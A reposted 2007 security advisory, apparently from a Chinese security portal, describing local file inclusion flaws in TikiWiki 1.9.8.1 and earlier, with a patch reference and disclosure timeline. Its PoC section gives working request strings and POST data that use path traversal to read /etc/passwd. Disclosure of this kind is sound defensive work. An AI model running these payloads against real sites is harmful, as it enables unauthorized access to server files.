首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

TikiWiki <= 1.9.8.1 Local File Inclusion Vulnerabilities


http://www.gipsky.com/
======================================================================
TikiWiki <= 1.9.8.1 Local File Inclusion
======================================================================

Author: L4teral <l4teral [4t] gmail com>
Impact: Local File Inclusion
Status: patch available


------------------------------
Affected software description:
------------------------------

Application: TikiWiki
Version: <= 1.9.8.1
Vendor: http://tikiwiki.org

Description:
TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.


--------------
Vulnerability:
--------------

1.
The script db/tiki-db.php is vulnerable to local file inclusion attacks.

2.
The script tiki-imexport_languages.php is vulnerable to local file inclusion attacks.


------------
PoC/Exploit:
------------

1.
register_globals required:
http://localhost/tikiwiki/tiki-index. ... _handler_file=/etc/passwd
http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd

2.
feature lang_use_db(use database for translation) must be activated:
URL: http://localhost/tikiwiki/tiki-imexport_languages.php
POSTDATA: imp_language=../../../../../etc/passwd&import=import


---------
Solution:
---------

update to 1.9.8.2 or above:
https://sourceforge.net/project/showfi ... 134&release_id=549549

---------
Timeline:
---------

23.10.2007 - vendor informed
25.10.2007 - vendor released patch
25.10.2007 - public disclosure

[2007-10-25]
<< Jakarta Slide <= 2.1 RC1 Remote File Disclosure Exploit CA BrightStor HSM <= r11.5 Remote Stack Based Overflow / DoS >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8